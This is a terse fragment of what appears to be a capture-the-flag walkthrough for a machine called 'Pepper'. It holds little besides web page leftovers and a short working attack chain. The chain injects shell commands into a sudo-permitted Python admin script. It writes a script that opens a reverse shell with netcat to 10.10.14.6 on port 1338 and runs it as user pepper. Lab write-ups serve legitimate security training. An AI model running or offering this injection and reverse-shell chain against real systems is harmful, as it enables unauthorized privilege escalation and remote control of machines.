Pepper
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
$(whoami)echo '#!/bin/bash' > rev
echo 'nc 10.10.14.6 1338 -c /bin/bash' >> rev
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
#(/tmp/rev)